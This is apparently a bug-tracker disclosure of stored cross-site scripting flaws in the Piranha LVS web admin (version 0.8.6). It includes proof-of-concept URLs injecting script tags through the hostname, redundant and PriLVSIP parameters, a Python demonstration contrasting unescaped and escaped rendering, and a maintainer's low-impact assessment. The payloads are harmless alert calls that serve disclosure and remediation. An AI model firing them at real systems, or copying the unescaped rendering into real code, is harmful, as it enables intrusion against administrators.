Description of the issue:

It seems that the Piranha web application does not escape its output and/or user input (hostnames/IPs/etc.), which leads to Cross Site Scripting vulnerabilities; some of them are reflected (low impact) and some are persistent/stored (high impact) in the configuration file '/etc/sysconfig/ha/lvs.cf'.

Tested version: piranha-0.8.6-4.el6.x86_64

Examples of the vulnerabilities:

1) stored XSS in hostname parameter (virtual_main.php / virtual_edit_virt.php)

NB. port, address and other parameters are also vulnerable.

PoC:
----
http://server:3636/secure/virtual_edit_virt.php?hostname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&port=80&protocol=tcp&address=0.0.0.0&vip_nmask=Unused&sorry_server=&fwmark=&device=eth0%3A1&reentry=15&timeout=6&quiesce_server=0&load=none&sched=Weighted+least-connections&persistent=&pmask=Unused&selected_host=1&vev_action=ACCEPT

Result:
The injection in the PoC will appear in the following page:
http://server:3636/secure/virtual_main.php

Relevant part of '/etc/sysconfig/ha/lvs.cf':

[...]
virtual <script>alert(1)</script> {
     active = 0
     address = 0.0.0.0 eth0:1
     port = 80
     send = "GET / HTTP/1.0\r\n\r\n"
     expect = "HTTP"
     use_regex = 0
     load_monitor = none
     scheduler = wlc
     protocol = tcp
     timeout = 6
     reentry = 15
     quiesce_server = 0
}

2) stored XSS in redundant parameter (redundancy.php)

NB. other parameters could also be vulnerable.

PoC:
----
http://server:3636/secure/redundancy.php?redundant=0.0.0.0%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&hb_interval=6&dead_after=18&hb_port=539&syncd_iface=&syncd_id=&redundancy_action=ACCEPT

Relevant part of '/etc/sysconfig/ha/lvs.cf':

[...]
backup = 0.0.0.0><script>alert(1)</script>
[...]

3) stored XSS in PriLVSIP (global_settings.php)

NB. other parameters could also be vulnerable.

PoC:
----
http://192.168.1.100:3636/secure/global_settings.php?PriLVSIP=192.168.1.100%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&primary_private=&tcp_timeout=&tcpfin_timeout=&udp_timeout=&global_action=ACCEPT

Relevant part of '/etc/sysconfig/ha/lvs.cf':

[...]
primary = 192.168.1.100"><script>alert(1)</script>
[...]
Created attachment 848233
A screenshot of one of the issues
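The three PoCs above all rely on the same defect: a value written to lvs.cf is read back and interpolated into HTML without output encoding. The following Python script is an added illustration of that defect and its fix; it is not piranha's code (piranha's UI is PHP) and the lvs.cf fragment, the HTML templates and the function names are constructed for the example. It reads the three payloads out of a sample config, renders them once as the buggy pages would and once with context-appropriate HTML escaping, then parses the result the way a browser would to count the <script> elements that end up live. The PriLVSIP value is put in a quoted attribute because that is what the "> prefix in PoC 3 is designed to break out of, which is also why html.escape must be called with quote=True.

```python
import html
from html.parser import HTMLParser

# The three payloads from the PoCs above, URL-decoded.
POC_HOSTNAME = "<script>alert(1)</script>"
POC_REDUNDANT = "0.0.0.0><script>alert(1)</script>"
POC_PRILVSIP = '192.168.1.100"><script>alert(1)</script>'

# Constructed lvs.cf fragment, in the same shape as the excerpts in the report.
SAMPLE_LVS_CF = (
    f"primary = {POC_PRILVSIP}\n"
    f"backup = {POC_REDUNDANT}\n"
    f"virtual {POC_HOSTNAME} {{\n"
    "    address = 0.0.0.0 eth0:1\n"
    "    port = 80\n"
    "}\n"
)


def parse_lvs_cf(text):
    """Pick out 'key = value' lines and 'virtual NAME {' headers.

    Simplified stand-in for the real config reader (hypothetical); it only
    needs to show that attacker-controlled strings come back out verbatim.
    """
    cfg = {"virtual": []}
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("virtual ") and line.endswith("{"):
            cfg["virtual"].append(line[len("virtual "):-1].strip())
        elif " = " in line:
            key, _, value = line.partition(" = ")
            cfg[key.strip()] = value.strip()
    return cfg


def render_unsafe(cfg):
    """Mirrors the bug: lvs.cf values are interpolated into HTML as-is.
    'primary' lands inside a quoted attribute, 'backup' and the virtual
    server names land in text content."""
    names = "".join(f"<td>{n}</td>" for n in cfg["virtual"])
    return (
        f'<input name="PriLVSIP" value="{cfg["primary"]}">'
        f'<p>backup: {cfg["backup"]}</p>'
        f"<table><tr>{names}</tr></table>"
    )


def render_safe(cfg):
    """Hardened form: every value is HTML-encoded on output. quote=True turns
    '"' into &quot; so a value cannot close the value="..." attribute."""
    def esc(s):
        return html.escape(s, quote=True)
    names = "".join(f"<td>{esc(n)}</td>" for n in cfg["virtual"])
    return (
        f'<input name="PriLVSIP" value="{esc(cfg["primary"])}">'
        f'<p>backup: {esc(cfg["backup"])}</p>'
        f"<table><tr>{names}</tr></table>"
    )


class _TagCollector(HTMLParser):
    """Records every start tag and the attributes of each <input>."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.inputs.append(dict(attrs))


def analyse(doc):
    """Parse rendered HTML as a browser would: how many <script> elements
    are live, and what value the PriLVSIP field actually carries."""
    p = _TagCollector()
    p.feed(doc)
    p.close()
    value = next((i.get("value") for i in p.inputs
                  if i.get("name") == "PriLVSIP"), None)
    return {"scripts": p.tags.count("script"), "prilvsip": value}


if __name__ == "__main__":
    cfg = parse_lvs_cf(SAMPLE_LVS_CF)
    print("unsafe:", analyse(render_unsafe(cfg)))  # 3 live scripts, field truncated at the injected quote
    print("safe:  ", analyse(render_safe(cfg)))    # 0 scripts, field shows the payload as literal text
```

In the escaped output the attribute value round-trips to the original string, so an administrator still sees exactly what was stored in lvs.cf, but no markup is created from it. The same encoding has to be applied wherever a config value is printed, which is why the report notes that port, address and the other parameters are affected as well.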
(In reply to Athmane Madjoudj from comment #0)
> which leads to Cross Site Scripting vulnerabilities, some of them are
> reflected (low impact)

Your report does not seem to specify any reflected XSS; only 3 stored XSS are listed.

> and some are persistent/stored (high impact) in the configuration file
> '/etc/sysconfig/ha/lvs.cf'

That's correct, input from lvs.cf is not encoded properly before being added to the output of the web application. However, I disagree with the high impact rating. For the application, lvs.cf is really a trusted input. Also, privileges to edit the file via the web application are administrative privileges, which makes this more of a bug than a real security issue.
(In reply to Tomas Hoger from comment #2)
> (In reply to Athmane Madjoudj from comment #0)
> > which leads to Cross Site Scripting vulnerabilities, some of them are
> > reflected (low impact)
>
> Your report does not seem to specify any reflected XSS; only 3 stored XSS are
> listed.

I didn't have time to check everything, so I could be wrong about reflected XSS.

> > and some are persistent/stored (high impact) in the configuration file
> > '/etc/sysconfig/ha/lvs.cf'
>
> That's correct, input from lvs.cf is not encoded properly before being
> added to the output of the web application. However, I disagree with the
> high impact rating. For the application, lvs.cf is really a trusted input.
> Also, privileges to edit the file via the web application are
> administrative privileges, which makes this more of a bug than a real
> security issue.

True